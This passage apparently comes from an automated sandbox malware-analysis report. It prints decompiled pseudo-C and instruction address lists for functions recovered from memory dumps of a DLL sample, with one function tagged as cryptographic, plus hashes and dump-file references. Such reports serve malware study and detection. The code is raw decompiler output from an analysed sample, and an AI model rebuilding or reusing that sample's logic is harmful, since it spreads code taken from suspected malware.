				asm("inc ecx");
				r11d = r11d + r10d;
				r8d = __rax + _t617 - 0x2b10cf7b;
				asm("inc ecx");
				r8d = r8d + r11d;
				asm("ror edx, 0x9");
				r9d = __rcx + __r10 - 0x262b2fc7;
				asm("inc ecx");
				r9d = r9d + __rax + _t619 + 0x4881d05 + r8d;
				asm("rol ecx, 0xb");
				r10d = __rax +  &(_t617[0x7e89f3e]);
				asm("inc ecx");
				r10d = r10d + __rax + __r11 - 0x1924661b + r9d;
				r8d = __rax + _t611 - 0x3b53a99b;
				asm("inc ecx");
				r8d = r8d + r10d;
				asm("rol edx, 0x6");
				r9d = __rax + __rcx + 0x432aff97;
				asm("inc ecx");
				r9d = r9d + __rax + _t619 - 0xbd6ddbc + r8d;
				asm("rol ecx, 0xf");
				r10d = __rax + _t617 - 0x36c5fc7;
				asm("inc ecx");
				r10d = r10d + __rax + __r10 - 0x546bdc59 + r9d;
				r8d = __rax +  &(_t611[0x655b59c3]);
				asm("inc ecx");
				r8d = r8d + r10d;
				asm("rol edx, 0xa");
				r9d = __rax + __rcx - 0x100b83;
				asm("inc ecx");
				r9d = r9d + __rax + _t619 - 0x70f3336e + r8d;
				asm("ror ecx, 0xb");
				r10d = __rax +  &(_t617[0x1bea1f93]);
				asm("inc ecx");
				r10d = r10d + __rax + __r10 - 0x7a7ba22f + r9d;
				r11d = __rax + _t611 - 0x1d31920;
				asm("inc ecx");
				r11d = r11d + r10d;
				r9d = __rax + _t619 - 0x5cfebcec;
				asm("inc ecx");
				r9d = r9d + r11d;
				asm("ror ebx, 0xb");
				r8d = __rax + __r10 - 0x8ac817e;
				asm("inc ecx");
				r8d = r8d + __rax + __rcx + 0x4e0811a1 + r9d;
				asm("rol edx, 0xa");
				_t596 = __rax + __r11 - 0x42c50dcb + r8d;
				_t620 = _a8;
				asm("rol ecx, 0xf");
				r8d =  !r8d;
				 *_t620 = _a24 + r8d;
				_t567 = __rax + _t619 + 0x2ad7d2bb + _t596;
				r8d = r8d | _t567;
				r8d = r8d ^ _t596;
				r8d = r8d + _v84;
				asm("ror eax, 0xb");
				 *((intOrPtr*)(_t620 + 4)) = _t617 + __rbx - 0x14792c6f +  *((intOrPtr*)(_t620 + 4)) + _t567;
				 *((intOrPtr*)(_t620 + 8)) =  *((intOrPtr*)(_t620 + 8)) + _t567;
				_t385 =  *((intOrPtr*)(_t620 + 0xc)) + _t596;
				 *((intOrPtr*)(_t620 + 0xc)) = _t385;
				return _t385;
			}






























                                0x201640ca918
                                0x201640ca91d
                                0x201640ca933
                                0x201640ca937
                                0x201640ca93e
                                0x201640ca945
                                0x201640ca949
                                0x201640ca94d
                                0x201640ca95a
                                0x201640ca975
                                0x201640ca978
                                0x201640ca97c
                                0x201640ca980
                                0x201640ca982
                                0x201640ca987
                                0x201640ca9a8
                                0x201640ca9bd
                                0x201640ca9c5
                                0x201640ca9c9
                                0x201640ca9e2
                                0x201640ca9ea
                                0x201640ca9ee
                                0x201640caa04
                                0x201640caa0c
                                0x201640caa10
                                0x201640caa27
                                0x201640caa2f
                                0x201640caa33
                                0x201640caa4e
                                0x201640caa68
                                0x201640caa70
                                0x201640caa74
                                0x201640caa87
                                0x201640caa8f
                                0x201640caa93
                                0x201640caa9c
                                0x201640caaa5
                                0x201640caabe
                                0x201640caac6
                                0x201640caaca
                                0x201640caae5
                                0x201640cab06
                                0x201640cab1c
                                0x201640cab24
                                0x201640cab28
                                0x201640cab3c
                                0x201640cab44
                                0x201640cab48
                                0x201640cab61
                                0x201640cab64
                                0x201640cab67
                                0x201640cab6f
                                0x201640cab7e
                                0x201640cab86
                                0x201640cab8a
                                0x201640cab9e
                                0x201640caba7
                                0x201640cabaf
                                0x201640cabb3
                                0x201640cabbf
                                0x201640cabc7
                                0x201640cabcc
                                0x201640cabd4
                                0x201640cabd8
                                0x201640cabe7
                                0x201640cabef
                                0x201640cabf3
                                0x201640cac0f
                                0x201640cac25
                                0x201640cac32
                                0x201640cac38
                                0x201640cac45
                                0x201640cac51
                                0x201640cac58
                                0x201640cac63
                                0x201640cac70
                                0x201640cac77
                                0x201640cac84
                                0x201640cac91
                                0x201640cac95
                                0x201640cacaf
                                0x201640caccb
                                0x201640cacd8
                                0x201640cacde
                                0x201640cace8
                                0x201640cacf4
                                0x201640cacfb
                                0x201640cad09
                                0x201640cad16
                                0x201640cad1d
                                0x201640cad3b
                                0x201640cad5b
                                0x201640cad6a
                                0x201640cad76
                                0x201640cad7c
                                0x201640cad89
                                0x201640cad95
                                0x201640cad9c
                                0x201640cada8
                                0x201640cadb0
                                0x201640cadb4
                                0x201640cadd0
                                0x201640caddc
                                0x201640cade4
                                0x201640cade8
                                0x201640cadfa
                                0x201640cae02
                                0x201640cae06
                                0x201640cae12
                                0x201640cae1d
                                0x201640cae21
                                0x201640cae2e
                                0x201640cae36
                                0x201640cae3a
                                0x201640cae4c
                                0x201640cae5f
                                0x201640cae67
                                0x201640cae6b
                                0x201640cae79
                                0x201640cae84
                                0x201640cae88
                                0x201640cae94
                                0x201640cae9c
                                0x201640caea0
                                0x201640caea9
                                0x201640caeb1
                                0x201640caeb5
                                0x201640caec8
                                0x201640caed0
                                0x201640caed4
                                0x201640caeee
                                0x201640caefc
                                0x201640caf04
                                0x201640caf08
                                0x201640caf18
                                0x201640caf27
                                0x201640caf31
                                0x201640caf35
                                0x201640caf42
                                0x201640caf4e
                                0x201640caf52
                                0x201640caf6b
                                0x201640caf79
                                0x201640caf86
                                0x201640caf8a
                                0x201640cafa0
                                0x201640cafae
                                0x201640cafbb
                                0x201640cafbf
                                0x201640cafc9
                                0x201640cafd5
                                0x201640cafd9
                                0x201640caff1
                                0x201640cb001
                                0x201640cb00e
                                0x201640cb012
                                0x201640cb02a
                                0x201640cb039
                                0x201640cb046
                                0x201640cb04a
                                0x201640cb054
                                0x201640cb060
                                0x201640cb064
                                0x201640cb071
                                0x201640cb07e
                                0x201640cb082
                                0x201640cb09a
                                0x201640cb0a9
                                0x201640cb0b6
                                0x201640cb0ba
                                0x201640cb0d2
                                0x201640cb0d5
                                0x201640cb0e9
                                0x201640cb0fb
                                0x201640cb0fe
                                0x201640cb101
                                0x201640cb104
                                0x201640cb106
                                0x201640cb109
                                0x201640cb10c
                                0x201640cb119
                                0x201640cb122
                                0x201640cb134
                                0x201640cb13c
                                0x201640cb13e
                                0x201640cb151

                                Memory Dump Source
                                • Source File: 00000000.00000002.631292957.00000201640C0000.00000040.00001000.00020000.00000000.sdmp, Offset: 00000201640C0000, based on PE: true
                                Joe Sandbox IDA Plugin
                                • Snapshot File: hcaresult_0_2_201640c0000_loaddll64.jbxd
                                Similarity
                                • API ID:
                                • String ID:
                                • API String ID:
                                • Opcode ID: 1e22f3bce40282fe11e099c1db0b1c5fb4d2825a674946890b536f4ba39d9287
                                • Instruction ID: 1234320190a57ce5198f3b4af1d4f0486c8f65fd9f93060ef17f932511bc9258
                                • Opcode Fuzzy Hash: 1e22f3bce40282fe11e099c1db0b1c5fb4d2825a674946890b536f4ba39d9287
                                • Instruction Fuzzy Hash: 5B12B4B7B784514BD71CCB19E892FA97792F394308B09912CEA17D3F44DA3DEA06CA00
                                Uniqueness

                                Uniqueness Score: -1.00%

                                Function 00007FFC130E5CC0 Relevance: .6, Instructions: 614COMMONCrypto
                                Download Yara Rule
                                C-Code - Quality: 57%
                                			E00007FFC7FFC130E5CC0(signed int __edx, short __edi, signed int __rax, long long __rcx, signed int __r8, signed int __r9, long long _a8, signed int _a16, signed int _a24, signed int _a32, intOrPtr _a40, intOrPtr _a48, signed long long _a56, signed int _a64, intOrPtr _a80, signed int _a88, signed short _a96) {
				long long _v80;
				long long _v88;
				signed int _v96;
				signed int _v104;
				signed int _v112;
				signed long long _v120;
				void* _v128;
				long long _v136;
				signed int _v144;
				signed long long _v152;
				signed long long _v168;
				signed int _v176;
				signed long long _v184;
				signed int _v192;
				signed int _v200;
				void* __rbx;
				void* __rdi;
				void* __r15;
				signed int _t406;
				short _t415;
				signed long long _t422;
				signed short _t440;
				long long _t446;
				signed int _t452;
				signed int _t453;
				short _t459;
				void* _t489;
				signed char _t514;
				signed short _t521;
				signed int _t522;
				signed short _t533;
				signed int _t543;
				signed int _t642;
				signed short _t646;
				signed int _t647;
				void* _t662;
				signed short _t670;
				long long _t671;
				signed long long _t673;
				signed long long _t675;
				signed long long _t680;
				signed long long _t682;
				signed long long _t683;
				intOrPtr _t689;
				long long _t691;
				signed long long _t696;
				intOrPtr _t697;
				intOrPtr _t698;
				signed int _t699;
				signed long long _t700;
				signed long long _t702;
				signed long long _t708;
				signed long long _t709;
				signed long long _t710;
				intOrPtr _t712;
				intOrPtr _t713;
				signed long long _t714;
				signed long long _t721;
				intOrPtr _t722;
				signed long long _t723;
				signed long long _t727;
				signed long long _t728;
				long long _t729;
				signed long long _t730;
				signed int* _t735;
				signed long long _t745;
				intOrPtr _t751;
				signed long long _t753;
				signed long long _t755;
				signed long long _t757;
				intOrPtr _t764;
				signed long long _t766;
				signed long long _t770;
				signed long long _t774;
				signed long long _t778;
				signed long long _t780;
				intOrPtr _t787;
				intOrPtr _t788;
				signed int _t790;
				signed long long _t791;
				signed long long _t797;
				signed long long _t799;
				signed int _t803;
				signed long long _t804;
				signed long long _t805;
				signed long long _t807;
				signed char* _t809;
				long long _t815;
				intOrPtr _t818;
				signed long long _t834;
				signed long long _t836;
				signed long long _t843;
				signed int* _t846;
				signed long long _t849;
				signed int _t851;
				signed long long _t853;
				signed long long _t854;
				signed long long _t858;
				intOrPtr _t864;
				signed int _t865;
				short* _t866;
				signed int _t867;

				_a32 = __r9;
				_a24 = __r8;
				_a16 = __edx;
				_a8 = __rcx;
				r9d = _a96 & 0x000000ff;
				_t521 =  *0x1312414c; // 0x0
				r14d = r9d;
				_t867 =  *0x13124124;
				_t522 = _t521 + 1;
				_t853 =  *(_a88 +  *0x13124148 * 4) | __rax;
				_t865 = _t867;
				_t864 =  *0x13124150; // 0x0
				_t514 = __edx & 0x000000ff;
				_v120 = _t853;
				_t670 =  *0x13124158; // 0x0
				r8d =  *0x13124130 & 0x0000ffff;
				_v112 = _t670;
				_t671 =  *0x131241a0; // 0x0
				_v128 = _t671;
				_t803 = r8d - r9d;
				r8w = r8w + 0xffff;
				 *0x1312414c = _t522;
				_v88 = _t671;
				 *0x13124130 = r8w;
				r8d =  *0x13124133 & 0x000000ff;
				r8b = r8b + 0xff;
				_v136 = _t522;
				_t673 =  *0x131241a8; // 0x0
				 *0x13124133 = r8b;
				r9d = r8b & 0xffffffff;
				r8b = r8b + 0xff;
				_a96 = r9d;
				r9d = _t514;
				 *0x13124133 = r8b;
				_v144 = _t673;
				_t815 = _t673 * 4;
				_t778 = r9d % ( *(_t673 + 0x97e) & 0x000000ff);
				_v152 = _t778;
				_v96 = _t803;
				_v104 = _t728;
				_v80 = _t815;
				if ( *((intOrPtr*)(_t815 + _v128)) - ( *0x13124122 & 0x000000ff) < 0) goto 0x130e5ea4;
				_t735 = _a40 + _t728 * 4;
				_t37 = _t867 + 0x461; // 0x533
				asm("cdq");
				_t406 = _t37 /  *_t735;
				 *_t735 = _t406;
				_t836 =  *0x13124180; // 0x0
				_t675 =  *0x131241a0; // 0x0
				_t846 = _a8 + _t675 * 4;
				 *_t846 = _t406 * _t836 /  *(_t853 +  *0x13124168 * 4) %  *_t846;
				goto 0x130e67fd;
				 *0x1312414c = _t846[0x4cd] * (_t514 & 0x000000ff);
				_t745 = _a56;
				 *((short*)(_t803 + 2 + (_t836 - ((_t836 - _t778 >> 1) + _t778 >> 8) * 0x1ff) * 2)) = __edi;
				r8d =  *0x13124148; // 0x0
				_t642 = r8d;
				r8d = r8d + 1;
				 *0x13124148 = r8d;
				if (_t642 == ( *(_t745 + r8d * 2) & 0x0000ffff)) goto 0x130e610d;
				_t854 =  *0x131241a0; // 0x0
				r8d =  *0x13124194; // 0x0
				r8d = r8d + _t642;
				r8d = 0xa65;
				_t799 = _t642;
				r8d = r8d - ( *0x13124130 & 0x0000ffff);
				_v192 = r11d;
				 *0x131241a0 = _t854 - 1;
				_v200 = r8d;
				_t415 = E00007FFC7FFC130FB370(_t854, _t745, _t778, _t799, r8d, _t867);
				_t729 = _v136;
				_v192 = _t642;
				_v200 = 0;
				 *((short*)(_t729 + _t745 * 8)) = _t415;
				 *((intOrPtr*)(_v80 +  *0x13124140)) = _t642 -  *((intOrPtr*)(_v80 +  *0x13124140));
				_t680 =  *0x13124158; // 0x0
				 *((intOrPtr*)(_a40 + _t680 * 4)) = _t642 -  *((intOrPtr*)(_a40 + _t680 * 4));
				_t818 =  *0x13124138; // 0x0
				asm("cdq");
				_t751 =  *0x13124160; // 0x0
				r9d =  *(_t799 + _t751) & 0x000000ff;
				_t422 = E00007FFC7FFC130FB370(_t680, _a32, _t778 +  *((intOrPtr*)(_t818 + _t799 * 8)),  *((intOrPtr*)(_t818 + _v96 * 8)) - _v152, r8d & _a32, _t867);
				_t533 =  *(_t799 * 8);
				_t780 = _t422;
				_v152 = _t780;
				if (_t533 == _t642) goto 0x130e60d3;
				asm("o16 nop [eax+eax]");
				_t682 =  *0x13124124;
				_t646 = (_t521 & 0x0000ffff |  *0x13124120) + 1;
				 *(_t864 + _t682 * 2) = ( *(_t864 + _t682 * 2) & 0x0000ffff) * (_t533 & 0x0000ffff);
				r8d =  *(_t865 + _t682 * 8) & 0x0000ffff;
				r8d = r8d * (_t533 & 0x0000ffff);
				 *(_t729 + (_t780 + _t780 * 2) * 2) =  *(_t729 + (_t780 + _t780 * 2) * 2) | r8w;
				_t683 =  *0x13124170; // 0x0
				 *(_t866 + _t683 * 2) = _t642;
				 *(_a88 + _a64 * 4) = ( *_a64 & 0x000000ff) %  *(_a88 + _a64 * 4);
				_t689 =  *0x13124178; // 0x0
				asm("cdq");
				r15d = (( *(_t689 +  *0x13124168 * 2) & 0x0000ffff) + ( *(_a48 + 0x1e16) & 0x000000ff)) % r15d;
				if (_t533 + 1 != _t642) goto 0x130e6020;
				r8d =  *0x13124148; // 0x0
				_t753 = _a56;
				r8d = r8d + 1;
				 *0x13124148 = r8d;
				if (_t642 + 1 != ( *(_t753 + r8d * 2) & 0x0000ffff)) goto 0x130e5ef0;
				_t849 = _a88;
				_t691 = r15d;
				_v136 = _t691;
				if (_t691 - _v152 <= 0) goto 0x130e6161;
				 *_t866 =  *_t866 + 1;
				_t804 =  *0x131241a0; // 0x0
				_t805 = _t804 - 1;
				 *0x131241a0 = _t805;
				if ( *((intOrPtr*)(_t849 + _t753 * 4)) -  *((intOrPtr*)(_v120 + _t805 * 4)) > 0) goto 0x130e6158;
				if ( *((intOrPtr*)(_t849 + _v144 * 8)) != _a96) goto 0x130e6158;
				r8d =  *0x13124148; // 0x0
				goto 0x130e617e;
				r8d =  *0x13124148; // 0x0
				goto 0x130e616d;
				if ( *((intOrPtr*)(_v104 + 8 + _v144 * 2)) - 0xa59 <= 0) goto 0x130e62eb;
				r9d =  *0x13124180 & 0x0000ffff;
				_t755 =  *0x13124168;
				asm("cdq");
				_t696 = _v128;
				r10d =  *(_t696 + _t755 * 2) & 0x0000ffff;
				_v184 = _t849;
				_v192 = ( *(_t865 + _t755 * 2) & 0x0000ffff) - 0x2c0;
				_v200 =  *(_t849 + _t755 * 4) /  *0x13124194;
				_t440 = E00007FFC7FFC130E81C0(_t696, _t729, 0x1999 / (_t646 & 0x0000ffff), _t799 +  *0x13124170, _t799 +  *0x13124170, _v104);
				_t543 =  *0x13124148; // 0x0
				_a96 = _t440;
				_t858 = _t543 + 0xffffeab4;
				_t757 =  *0x131241a0; // 0x0
				r9d =  *(_t757 + _v88 + 4) & 0x000000ff;
				_v168 = _t696;
				r9d = r9d & 0x00001649;
				_v176 =  *0x13124133 & 0x000000ff;
				_v184 = ( *(_t866 + 0x2a0e) & 0x0000ffff) - 0x1bcd;
				r8d = 0x1188;
				_v192 = (0x157da0e3 *  *0x13124134 >> 0x20 >> 9) + (0x157da0e3 *  *0x13124134 >> 0x20 >> 9 >> 0x1f);
				_v200 = 0x8d3;
				_t446 = E00007FFC7FFC130E9620(_t646, _t729, _t858, _t799 +  *0x13124170, ( *(_t866 + 0x2a0e) & 0x0000ffff) - 0x1bcd);
				_t851 = _a88;
				_t697 =  *0x13124138; // 0x0
				 *((long long*)(_t697 + (0x23 + _t696 * 4) * 8)) = _t446;
				r8d =  *0x13124148; // 0x0
				_t807 =  *0x131241a0; // 0x0
				goto 0x130e62f8;
				_t787 =  *0x13124150; // 0x0
				r11d = _t646 & 0x0000ffff;
				if (_t697 != _t787) goto 0x130e647e;
				_t698 =  *0x13124128; // 0x0
				r9d = _a16 & 0x000000ff;
				r9b = r9b + 1;
				if (( *(_v128 + _v104 * 4) & 0x0000ffff) ==  *((intOrPtr*)(_t698 +  *0x13124168 * 4))) goto 0x130e648c;
				_t788 =  *0x13124150; // 0x0
				if ( *((intOrPtr*)(_a8 + _t858 * 4)) - 0x1f27 < 0) goto 0x130e648c;
				if ( *0x13124168 - 0x15a4 < 0) goto 0x130e648c;
				r8d = r8d + 1;
				_t699 = r8d;
				 *0x13124148 = r8d;
				r9d = 0x19ec;
				_t764 =  *0x131241a8; // 0x0
				_t730 = (r9b & 0xffffffff) - ( *(_t699 + _a48) & 0x000000ff);
				_t452 =  *0x1312414c; // 0x0
				_t453 = _t452 - 1;
				 *0x1312414c = _t453;
				r9w = r9w - _t453;
				 *0x1312416c = ( *0x1312416c & 0x0000ffff) + 1;
				r10d =  *(_t699 + _t764) & 0x000000ff;
				_t700 = _v152;
				r10d = r10d & _a96;
				r8d =  *(_t764 + _t700 * 4) & 0x000000ff;
				r8d = 0x1081;
				 *0x131241a0 = _t807 + 1;
				_t702 = ( *(_t865 + 0x2c + (_t700 + _t700 * 2) * 2) & 0x0000ffff) % r8d;
				_v184 = _t702;
				_v192 = 0x6c8;
				_v200 = r10d;
				_t459 = E00007FFC7FFC130E81C0(_t702, _t730, _t730, _v136 + _t788, _v88, _v104);
				_t766 =  *0x131241a0; // 0x0
				_t790 = _a32;
				 *((short*)(_t790 + 0x1c + _t766 * 2)) = _t459;
				 *((short*)(_t865 + _t766 * 2)) = 0x1553 -  *((intOrPtr*)(_t865 + _t766 * 2));
				asm("cdq");
				asm("cdq");
				 *(_t790 + _t702 * 2) = ( *0x13124130 & 0x0000ffff) %  *0x13124168 % ( *(_t790 + _t702 * 2) & 0x0000ffff);
				 *0x13124124 =  *0x13124124 - 1;
				goto 0x130e67fd;
				r9d = _a16 & 0x000000ff;
				goto 0x130e6345;
				r9b = r9b + 0xff;
				_t809 = _a64;
				_a88 = _t702;
				_a16 = r9b;
				 *(_a32 + _t702 * 2) =  *(_a32 + _t702 * 2) ^ 0x0000d5ef;
				_t791 =  *0x131241a0; // 0x0
				 *0x131241a0 = _t791 + 1;
				 *((short*)(_t864 + _t766 * 2)) = (r9b & 0xffffffff) / _t766;
				_t708 =  *0x13124180; // 0x0
				 *(_t766 * 8) = _t708;
				_t662 =  *0x13124190 - (_t809[0x1258] & 0x000000ff); // 0x0
				if (_t662 != 0) goto 0x130e6734;
				_t647 = _v112 & 0x0000ffff;
				_a96 = 0x4d1 - _t646;
				_t709 =  *0x131241a0; // 0x0
				_t710 = _t709 + _t709;
				asm("cdq");
				 *0x13124194 =  *(_t851 + _t710 * 8) / _t647;
				 *(_t730 << 5) = _t710 ^ _a24;
				_t712 =  *0x13124178; // 0x0
				_t713 =  *0x13124140; // 0x0
				_t714 =  *0x13124160; // 0x0
				asm("cdq");
				_t843 = ( *(_t714 + 0x59b) & 0x000000ff) /  *0x13124168;
				r10d =  *(_v96 + _t714 * 2) & 0x0000ffff;
				_v192 = r10d;
				_v200 =  *((intOrPtr*)(_t851 + 0x21d8));
				_t489 = E00007FFC7FFC130FB370(_t714, _v96, ( *(_t712 + _t730 * 4 - 4) & 0x0000ffff) - (0x415708ef * ( *(_t712 + _t730 * 4 - 4) & 0x0000ffff) >> 0x20 >> 8) * 0x3eb,  *(_t713 +  *0x13124124 * 4) * 0xfc9, _t843, _t867);
				asm("cdq");
				 *0x13124168 = (_a80 - 1) %  *0x13124168;
				_t797 =  *0x13124160; // 0x0
				r9d =  *_t809 & 0x000000ff;
				if ( *((intOrPtr*)(_t797 + _t843 * 2)) - ( *(_t714 + _t797) & 0x000000ff) >= 0) goto 0x130e66cd;
				if (_v112 - 0x1923 > 0) goto 0x130e66cd;
				_t770 =  *0x13124124;
				if ( *((intOrPtr*)(_v96 +  *0x13124148 * 2)) != ( *(_v104 + _t770 * 2) & 0x0000ffff)) goto 0x130e66cd;
				if (_t770 ==  *(_a88 * 8)) goto 0x130e66cd;
				 *((char*)(_v144 + _a48)) = 0x1923 / _t770;
				goto 0x130e67fd;
				r9d = _a16 & 0x000000ff;
				_t721 = _t647 - (0x39835051 * _t647 >> 0x20 >> 9) * 0x8e7 -  *0x131241a0;
				 *0x131241a0 = _t721;
				 *((intOrPtr*)(_t721 * 2 + _t865)) =  *((intOrPtr*)(_t721 * 2 + _t865)) + 0x1c74 - r8w;
				 *0x13124123 = (_a96 & 0x0000ffff) / ( *0x13124130 & 0x0000ffff);
				r9b = r9b + 0xff;
				r15w = r15w & 0x00000044;
				_t722 =  *0x13124188; // 0x0
				_t774 = _t489 + _t489;
				_t723 =  *0x131241a0; // 0x0
				 *((short*)(_a56 + _t721 * 4)) = ( *(_t866 + 0x38 + _t723 * 2) & 0x0000ffff) + ( *(_t722 + 0x38 + _t774 * 8) & 0x0000ffff) -  *((intOrPtr*)(_a56 + _t721 * 4));
				 *0x131241a0 =  *0x131241a0 + 1;
				r15w = r15w -  *(_t866 + _t723 * 2);
				 *(_t866 + _t723 * 2) = r15w;
				 *(_a8 + _t774 * 4) = (r9b & 0xffffffff) /  *0x13124180 /  *(_a8 + _t774 * 4);
				_t834 =  *0x13124170; // 0x0
				_t727 =  *0x13124134;
				 *(_t834 * 8) =  *(_t834 * 8) | 0x0000127b % ( *(_t866 + _t797 * 2) & 0x0000ffff) ^ _t727;
				 *((short*)(_a32 + _t727 * 4)) = 0x1189 -  *((intOrPtr*)(_a32 + _t727 * 4));
				return 0x1d67;
			}









































































































                                0x7ffc130e5cc0
                                0x7ffc130e5cc5
                                0x7ffc130e5cca
                                0x7ffc130e5cce
                                0x7ffc130e5cfc
                                0x7ffc130e5d05
                                0x7ffc130e5d0b
                                0x7ffc130e5d0e
                                0x7ffc130e5d1c
                                0x7ffc130e5d25
                                0x7ffc130e5d2f
                                0x7ffc130e5d32
                                0x7ffc130e5d39
                                0x7ffc130e5d3e
                                0x7ffc130e5d4a
                                0x7ffc130e5d54
                                0x7ffc130e5d5c
                                0x7ffc130e5d64
                                0x7ffc130e5d6e
                                0x7ffc130e5d73
                                0x7ffc130e5d7b
                                0x7ffc130e5d7f
                                0x7ffc130e5d8b
                                0x7ffc130e5d93
                                0x7ffc130e5d9b
                                0x7ffc130e5da3
                                0x7ffc130e5daa
                                0x7ffc130e5daf
                                0x7ffc130e5db6
                                0x7ffc130e5dbd
                                0x7ffc130e5dc1
                                0x7ffc130e5dc5
                                0x7ffc130e5dde
                                0x7ffc130e5de6
                                0x7ffc130e5ded
                                0x7ffc130e5df2
                                0x7ffc130e5dfa
                                0x7ffc130e5e04
                                0x7ffc130e5e09
                                0x7ffc130e5e11
                                0x7ffc130e5e19
                                0x7ffc130e5e26
                                0x7ffc130e5e30
                                0x7ffc130e5e34
                                0x7ffc130e5e3b
                                0x7ffc130e5e3c
                                0x7ffc130e5e3e
                                0x7ffc130e5e40
                                0x7ffc130e5e47
                                0x7ffc130e5e56
                                0x7ffc130e5e9c
                                0x7ffc130e5e9f
                                0x7ffc130e5eb1
                                0x7ffc130e5ebb
                                0x7ffc130e5ec3
                                0x7ffc130e5ec8
                                0x7ffc130e5ecf
                                0x7ffc130e5ed2
                                0x7ffc130e5ed8
                                0x7ffc130e5ee5
                                0x7ffc130e5ef0
                                0x7ffc130e5f03
                                0x7ffc130e5f11
                                0x7ffc130e5f25
                                0x7ffc130e5f2b
                                0x7ffc130e5f2e
                                0x7ffc130e5f3a
                                0x7ffc130e5f41
                                0x7ffc130e5f48
                                0x7ffc130e5f4d
                                0x7ffc130e5f57
                                0x7ffc130e5f5c
                                0x7ffc130e5f60
                                0x7ffc130e5f69
                                0x7ffc130e5f80
                                0x7ffc130e5f82
                                0x7ffc130e5f99
                                0x7ffc130e5fa1
                                0x7ffc130e5fa8
                                0x7ffc130e5fc7
                                0x7ffc130e5fd3
                                0x7ffc130e5fec
                                0x7ffc130e5ff1
                                0x7ffc130e5ffd
                                0x7ffc130e6000
                                0x7ffc130e6007
                                0x7ffc130e6015
                                0x7ffc130e6020
                                0x7ffc130e6027
                                0x7ffc130e6039
                                0x7ffc130e6046
                                0x7ffc130e604c
                                0x7ffc130e6058
                                0x7ffc130e605c
                                0x7ffc130e6063
                                0x7ffc130e6099
                                0x7ffc130e60a3
                                0x7ffc130e60bf
                                0x7ffc130e60c3
                                0x7ffc130e60c8
                                0x7ffc130e60d3
                                0x7ffc130e60dc
                                0x7ffc130e60e4
                                0x7ffc130e60ea
                                0x7ffc130e60f7
                                0x7ffc130e60fd
                                0x7ffc130e610d
                                0x7ffc130e6110
                                0x7ffc130e6118
                                0x7ffc130e611a
                                0x7ffc130e611e
                                0x7ffc130e6125
                                0x7ffc130e6128
                                0x7ffc130e6140
                                0x7ffc130e614d
                                0x7ffc130e614f
                                0x7ffc130e6156
                                0x7ffc130e6158
                                0x7ffc130e615f
                                0x7ffc130e6178
                                0x7ffc130e6186
                                0x7ffc130e61b2
                                0x7ffc130e61d8
                                0x7ffc130e61ea
                                0x7ffc130e61ef
                                0x7ffc130e61fe
                                0x7ffc130e6206
                                0x7ffc130e620e
                                0x7ffc130e6212
                                0x7ffc130e6217
                                0x7ffc130e6230
                                0x7ffc130e624a
                                0x7ffc130e6252
                                0x7ffc130e6266
                                0x7ffc130e626e
                                0x7ffc130e6273
                                0x7ffc130e628c
                                0x7ffc130e6295
                                0x7ffc130e629a
                                0x7ffc130e629d
                                0x7ffc130e62a2
                                0x7ffc130e62ab
                                0x7ffc130e62b0
                                0x7ffc130e62d0
                                0x7ffc130e62d7
                                0x7ffc130e62db
                                0x7ffc130e62e2
                                0x7ffc130e62e9
                                0x7ffc130e62fd
                                0x7ffc130e6304
                                0x7ffc130e6310
                                0x7ffc130e6322
                                0x7ffc130e6329
                                0x7ffc130e6332
                                0x7ffc130e6338
                                0x7ffc130e633e
                                0x7ffc130e6355
                                0x7ffc130e6365
                                0x7ffc130e6373
                                0x7ffc130e637e
                                0x7ffc130e6384
                                0x7ffc130e6391
                                0x7ffc130e639f
                                0x7ffc130e63a6
                                0x7ffc130e63a9
                                0x7ffc130e63af
                                0x7ffc130e63b1
                                0x7ffc130e63b7
                                0x7ffc130e63c5
                                0x7ffc130e63cf
                                0x7ffc130e63d4
                                0x7ffc130e63d9
                                0x7ffc130e63e1
                                0x7ffc130e63f6
                                0x7ffc130e63fc
                                0x7ffc130e6403
                                0x7ffc130e6409
                                0x7ffc130e640e
                                0x7ffc130e6417
                                0x7ffc130e641c
                                0x7ffc130e6421
                                0x7ffc130e6428
                                0x7ffc130e6430
                                0x7ffc130e6443
                                0x7ffc130e6463
                                0x7ffc130e646c
                                0x7ffc130e646f
                                0x7ffc130e6473
                                0x7ffc130e6479
                                0x7ffc130e647e
                                0x7ffc130e6487
                                0x7ffc130e6494
                                0x7ffc130e6498
                                0x7ffc130e64a9
                                0x7ffc130e64b1
                                0x7ffc130e64b9
                                0x7ffc130e64be
                                0x7ffc130e64cf
                                0x7ffc130e6505
                                0x7ffc130e6510
                                0x7ffc130e651f
                                0x7ffc130e652e
                                0x7ffc130e6535
                                0x7ffc130e654a
                                0x7ffc130e654f
                                0x7ffc130e6556
                                0x7ffc130e655d
                                0x7ffc130e6564
                                0x7ffc130e656c
                                0x7ffc130e6594
                                0x7ffc130e6597
                                0x7ffc130e65c6
                                0x7ffc130e65de
                                0x7ffc130e65ec
                                0x7ffc130e6601
                                0x7ffc130e660b
                                0x7ffc130e6612
                                0x7ffc130e6617
                                0x7ffc130e661c
                                0x7ffc130e6634
                                0x7ffc130e663b
                                0x7ffc130e6641
                                0x7ffc130e664c
                                0x7ffc130e6658
                                0x7ffc130e6664
                                0x7ffc130e666e
                                0x7ffc130e6686
                                0x7ffc130e669e
                                0x7ffc130e66c4
                                0x7ffc130e66c8
                                0x7ffc130e66cd
                                0x7ffc130e66f5
                                0x7ffc130e66fc
                                0x7ffc130e6718
                                0x7ffc130e672e
                                0x7ffc130e6739
                                0x7ffc130e6745
                                0x7ffc130e674e
                                0x7ffc130e6758
                                0x7ffc130e6760
                                0x7ffc130e6778
                                0x7ffc130e677c
                                0x7ffc130e6786
                                0x7ffc130e678e
                                0x7ffc130e67bf
                                0x7ffc130e67c7
                                0x7ffc130e67da
                                0x7ffc130e67e7
                                0x7ffc130e67f8
                                0x7ffc130e6815

                                Memory Dump Source
                                • Source File: 00000000.00000002.632264364.00007FFC130E1000.00000020.00000001.01000000.00000003.sdmp, Offset: 00007FFC130E0000, based on PE: true
                                • Associated: 00000000.00000002.631948100.00007FFC130E0000.00000002.00000001.01000000.00000003.sdmpDownload File
                                • Associated: 00000000.00000002.632387402.00007FFC13103000.00000002.00000001.01000000.00000003.sdmpDownload File
                                • Associated: 00000000.00000002.633723411.00007FFC13118000.00000004.00000001.01000000.00000003.sdmpDownload File
                                • Associated: 00000000.00000002.633858879.00007FFC13119000.00000008.00000001.01000000.00000003.sdmpDownload File
                                • Associated: 00000000.00000002.633873174.00007FFC13123000.00000004.00000001.01000000.00000003.sdmpDownload File
